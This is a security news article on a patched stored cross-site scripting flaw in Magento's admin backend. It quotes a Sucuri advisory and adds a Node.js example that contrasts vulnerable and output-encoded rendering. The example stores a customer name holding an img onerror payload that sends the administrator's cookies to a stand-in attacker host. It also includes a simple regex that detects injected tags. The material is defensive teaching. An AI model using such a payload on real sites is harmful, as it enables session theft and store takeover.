A just-patched vulnerability in the Magento eCommerce platform has left potentially millions of online merchants at risk of having their stores hijacked.
The flaw is a stored cross-site scripting (XSS) bug: attacker-supplied script is saved by the application and later rendered in the administrator backend. Because that script runs in the browser of a logged-in administrator, with that account's session and privileges, an attacker can take control of the store and, through whatever the administration panel permits, potentially the server running it.
“The buggy snippet is located inside Magento core libraries, more specifically within the administrator’s backend,” a Sucuri advisory explained. “Unless you’re behind a WAF or you have a very heavily modified administration panel, you’re at risk. As this is a Stored XSS vulnerability, this issue could be used by attackers to take over your site, create new administrator accounts, steal client information, anything a legitimate administrator account is allowed to do.”
XSS bugs arise when a web application places untrusted, user-supplied input into a page without encoding it for the context it lands in, so the browser interprets the data as HTML markup or script instead of text. In a stored XSS the payload is saved on the server and served to everyone who later views the affected page; in this case, that audience is the store's administrators.
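The following is an added example, not code from Magento or from the Sucuri advisory, that models the mechanism above in a few lines of Node.js: a constructed "customer" record carrying a script payload, an admin listing that concatenates the stored value straight into HTML, and the same listing with output encoding applied. The record data, the template and all function names are assumptions for illustration; Magento's own templates would use the framework's escaping helpers rather than a hand-written encoder.

```javascript
// Added example (not Magento or Sucuri code): stored XSS in an admin listing,
// vulnerable rendering beside the output-encoded fix.

// Constructed records standing in for a customer table. The second customer
// registered with a payload as their name; nothing validated it on the way in.
const customers = [
  { id: 1, name: 'Alice Example', email: 'alice@example.com' },
  {
    id: 2,
    name: '<img src=x onerror="fetch(\'https://attacker.invalid/?c=\'+document.cookie)">',
    email: 'mallory@example.com',
  },
];

// Vulnerable rendering: the stored value is dropped into HTML unchanged, so
// the browser of whichever administrator opens the listing parses the <img>
// tag and runs its onerror handler with that administrator's session.
function renderCustomerRowVulnerable(c) {
  return `<tr><td>${c.id}</td><td>${c.name}</td><td>${c.email}</td></tr>`;
}

// Minimal encoder for the HTML text and double-quoted attribute contexts.
// '&' must be replaced first so the entities it produces are not re-encoded.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened rendering: every untrusted value is encoded at the point it is
// written into the page, so the payload is displayed as literal text.
function renderCustomerRowSafe(c) {
  return `<tr><td>${escapeHtml(c.id)}</td><td>${escapeHtml(c.name)}</td><td>${escapeHtml(c.email)}</td></tr>`;
}

// The admin page that every administrator will load.
function renderAdminPage(records, renderRow) {
  return `<table>${records.map(renderRow).join('')}</table>`;
}

// Crude detector used only to show the difference: does the output contain a
// tag the template itself never emits? A real test would parse the DOM.
function containsInjectedTag(html) {
  return /<(img|script)\b/i.test(html);
}

// Stand-alone demonstration.
console.log('vulnerable contains payload tag:',
  containsInjectedTag(renderAdminPage(customers, renderCustomerRowVulnerable)));
console.log('hardened contains payload tag:',
  containsInjectedTag(renderAdminPage(customers, renderCustomerRowSafe)));
```

The fix is encoding on output, not "stripping" on input: the stored value stays exactly as the user entered it, and the rendering layer decides how it is represented in each context. In Magento templates the equivalent is the block's `escapeHtml()` helper (with separate helpers for attribute, URL and JavaScript contexts in newer releases), applied to every value a template echoes.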
They remain one of the most common classes of web application vulnerability, and security experts recommend that Magento users install the patch as soon as possible. A WAF in front of the administration panel may block known payloads, but it is a stopgap rather than a substitute for applying the fix.